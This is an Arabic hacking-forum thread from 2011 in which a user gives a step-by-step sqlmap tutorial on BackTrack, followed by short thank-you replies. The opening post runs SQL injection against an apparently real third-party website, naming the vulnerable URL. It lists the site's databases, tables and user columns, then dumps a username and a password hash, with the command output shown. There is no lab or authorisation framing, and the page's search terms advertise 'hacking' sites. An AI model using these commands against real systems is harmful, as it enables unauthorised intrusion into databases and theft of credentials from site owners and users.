اشترك في قناتنا ليصلك جديدنا

اشترك في قناتنا على اليوتيوب ليصلك جديدنا

كذلك الاعجاب بصفحتنا على الفيسبوك

[دورة التوزيعات الامنية] استغلال ثغرات sql في الباك تراك

[دورة التوزيعات الامنية] استغلال ثغرات sql في الباك تراك


صفحة 1 من 8 123 ... الأخيرةالأخيرة
النتائج 1 إلى 10 من 75

الموضوع: [دورة التوزيعات الامنية] استغلال ثغرات sql في الباك تراك

  1. #1
    هكر مجتهد Array الصورة الرمزية r00t-minat0r
    تاريخ التسجيل
    May 2011
    الدولة
    JORDAN
    المشاركات
    362

    aljyyosh [دورة التوزيعات الامنية] استغلال ثغرات sql في الباك تراك



    بسم الله الرحمن الرحيم
    السلام عليكم ورحمة الله وبركاته
    الكل يعرف انه ثغرات sql من اقوى واكثر الثغرات انتشارا واحيانا تاخذ وقت في عملية الأستهداف ولاكن الان تستطيع استهداف المواقع المصابة بكل سرعة ممكنة باستخدام اداة في الباك تراك
    اسم الأداة :sqlmap
    مسار الاداة : /pentest/database/sqlmap
    لغة البرمجة : python
    الأن كيفية استخدام الاداة في عملية الحقن

    اولا : استخراج اسماء قواعد البيانات
    لنقل ان هذا الموقع مصاب بثغرة sql
    كود:
    http://www.bcspeakers.com/page.php?id=22
    وكلنا نعرف كيفية الفحص وهي باضافة ' الى نهاية الرابط واذا وجد خطأ كان الموقع مصاب
    الأن الأمر المستخدم في استخراج القواعد لهذا الموقع
    كود:
    python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 --dbs
    النتيجة
    كود:
    available databases [2]:
    [*] information_schema
    [*] www-bcspeakerstest
    مثل ما شفتو تم استخراج القواعد والان القاعدة المستهدفة هي " www-bcspeakerstest"
    ثانيا : استخراج الجداول
    القاعدة المستهدفة هي " www-bcspeakerstest"
    سوف يكون الأمر بهذا الشكل

    كود:
    python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest --tables
    والنتيجة كبيرة لن اضعها لانها تتكون من 59 جدول على كل حال انا وجدت الجدول المستهدف وهو "_user"
    ثالثا : استخراج الأعمدة
    الان نأتي الى استخراج الأعمدة الموجودة في جدول "_user"
    الكود كالتالي

    كود:
    python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user --columns
    والنتيجة كالتالي
    كود:
    +----------+---------------------------+
    | Column   | Type                      |
    +----------+---------------------------+
    | id_user  | int(10) unsigned zerofill |
    | password | text                      |
    | username | text                      |
    +----------+---------------------------+
    كما ترون الأعمدة المستهدفة هي
    password
    username
    رابعا : اسخراج البيانات من الاعمدة
    العمود الاول هو عامود اسم المستخدم "username" سوف يكون الكود كالتالي
    كود:
    python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user -C username --dump
    النتيجة
    كود:
    +--------------+
    | username     |
    +--------------+
    | becspeak2803 |
    | becspeak2803 |
    +--------------+
    كما ترون استخرجنا اسم المستخدم
    والان نأتي الى استخراج الباسورود
    اكود مثل السابق مع تغيير اسم العامود الى عامود الباسوورد

    كود:
    python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user -C password --dump
    سوف تسألك الأداة اذا كنت تريد محاولة مقارنة الهاش مع قاعدة البيانات المرفقة باالأداة
    كود:
    recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q]
    تختار مثل ما نت عاوز
    انا اخترت لا لتسريع العملية والنتيجة كالتالي

    كود:
    +----------------------------------+
    | password                         |
    +----------------------------------+
    | 286adae502ad9d5ab8c4f8644050b448 |
    | 286adae502ad9d5ab8c4f8644050b448 |
    +----------------------------------+
    كما ترون تم استخراج البيانات بسرعة كبيرة
    اتمنى ان يعجبكم الشرح
    وأي استفسار انا جاهز
    والسلام عليكم ورحمة الله وبركاته

    التعديل الأخير تم بواسطة r00t-minat0r ; 12-30-2011 الساعة 03:17 PM


  2. #2
    هكر مبتديء Array
    تاريخ التسجيل
    Jun 2011
    المشاركات
    62

    افتراضي رد: استغال ثغرات sql في الباك تراك

    والله بجد روعة الله يوفقك ، أتمنى المزيد والمزيد من مشاركاتك الرائعة والحصرية


  3. #3
    هكر مجتهد Array الصورة الرمزية r00t-minat0r
    تاريخ التسجيل
    May 2011
    الدولة
    JORDAN
    المشاركات
    362

    افتراضي رد: استغال ثغرات sql في الباك تراك

    اقتباس المشاركة الأصلية كتبت بواسطة halk green مشاهدة المشاركة
    والله بجد روعة الله يوفقك ، أتمنى المزيد والمزيد من مشاركاتك الرائعة والحصرية
    بارك الله فيك ومشكور على مرورك العطر



  4. #4
    هكر مجتهد Array الصورة الرمزية Omar Hack
    تاريخ التسجيل
    Aug 2011
    الدولة
    THE KINGDOM OF ALGYYOSH
    المشاركات
    377

    افتراضي رد: استغال ثغرات sql في الباك تراك

    بارك الله فيك أخوي العزيز
    وزادك الله من علمه


  5. #5
    هكر مبتديء Array
    تاريخ التسجيل
    Jun 2011
    المشاركات
    62

    افتراضي رد: استغال ثغرات sql في الباك تراك

    والله مشكور عنجد مجهود رائع


  6. #6
    هكر متميز Array الصورة الرمزية Ace
    تاريخ التسجيل
    May 2010
    الدولة
    In Hell
    المشاركات
    1,849

    افتراضي رد: استغال ثغرات sql في الباك تراك

    الشرح الفديو بنزلو قريبا ومشكور اخي على الطرح استمر



  7. #7
    هكر مبتديء Array الصورة الرمزية djxxjd
    تاريخ التسجيل
    Feb 2010
    المشاركات
    42

    افتراضي رد: استغال ثغرات sql في الباك تراك

    niccccccccce


  8. #8
    هكر مبتديء Array الصورة الرمزية djxxjd
    تاريخ التسجيل
    Feb 2010
    المشاركات
    42

    افتراضي رد: استغال ثغرات sql في الباك تراك

    gooooooooooooood


  9. #9
    هكر مجتهد Array الصورة الرمزية r00t-minat0r
    تاريخ التسجيل
    May 2011
    الدولة
    JORDAN
    المشاركات
    362

    افتراضي رد: استغال ثغرات sql في الباك تراك

    اقتباس المشاركة الأصلية كتبت بواسطة Omar Hack مشاهدة المشاركة
    بارك الله فيك أخوي العزيز
    وزادك الله من علمه
    مشكور اخي عمر على مرورك اتمنى ان يكون الشرح ذا فائدة للجميع

    اقتباس المشاركة الأصلية كتبت بواسطة Portgas~D~Ace مشاهدة المشاركة
    الشرح الفديو بنزلو قريبا ومشكور اخي على الطرح استمر
    ان شاء الله اخي العزيز مشكور على مرورك منور الموضوع
    سوف نضع المزيد من المواضييع في هذا القسم الرائع بأذن الله خلاص انتهى زمان البيفروست وغيره

    اقتباس المشاركة الأصلية كتبت بواسطة djxxjd مشاهدة المشاركة
    niccccccccce
    مشكور على مرورك اخي الكريم



  10. #10
    هكر متميز Array الصورة الرمزية Mad Devil
    تاريخ التسجيل
    Mar 2011
    الدولة
    Grand Line
    المشاركات
    647

    افتراضي رد: استغال ثغرات sql في الباك تراك

    مشكورررر يالغالي والله ماقصرت

    ويا portgas~D~Ace

    ممكن الفيديو لو سمحت يعني


صفحة 1 من 8 123 ... الأخيرةالأخيرة

المواضيع المتشابهه

  1. [دورة التوزيعات الامنية] كشف تلغيم البرامج بالباك تراك
    بواسطة r00t-minat0r في المنتدى قسم باك تراك BackTrack
    مشاركات: 44
    آخر مشاركة: 05-30-2013, 01:13 AM
  2. مشاركات: 64
    آخر مشاركة: 05-21-2013, 02:43 PM
  3. [دورة التوزيعات الامنية] سكربت جيوش الهكر للباك تراك
    بواسطة r00t-minat0r في المنتدى قسم باك تراك BackTrack
    مشاركات: 33
    آخر مشاركة: 11-14-2012, 03:15 PM
  4. مشاركات: 20
    آخر مشاركة: 10-02-2012, 07:37 AM
  5. مشاركات: 37
    آخر مشاركة: 10-22-2011, 02:45 AM

وجد الزوار هذه الصفحة بالبحث عن:

استغلال ثغرة SQL بالباك تراك

مواقع مصابة بثغرة sqlmap

إختراق المواقع المصابة sql بواسطة الباك تراك 5

اوامر الباك تراك لحقن المواقع المصابة

اكتشاف الثغرات بالباك تراك

اوامر الحقن بالباك تراك

حقن المواقع بالباك تراك

استغلال ثغرة sql injection بالباك تراك

ثغرة باك تراك

اوامر اداة sqlmap

sqlm جيوش الهكر

اوامر الباك تراك لحقن المواقع

اختراق موقاع مصابة بثغرة sql بالباكتراك

هكر الفيس بوك عن طريق ثغرات مستهدفة

اختراق المواقع المصابة بثغرة sql بالباك تراك

اختراق موقع sql بالباك تراكأوامر sqlmapاختراق مواقع sql بالباك تراكاوامر الحقن sqlmapاوامر حقن المواقع بالباك تراكاوامر الباك تراك site:www.aljyyosh.comاستغلال ثغرة sqlsql باك تراك كل اوامر sqlmap h hlv hgprk fhgfh; jvh;

الكلمات الدلالية لهذا الموضوع

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •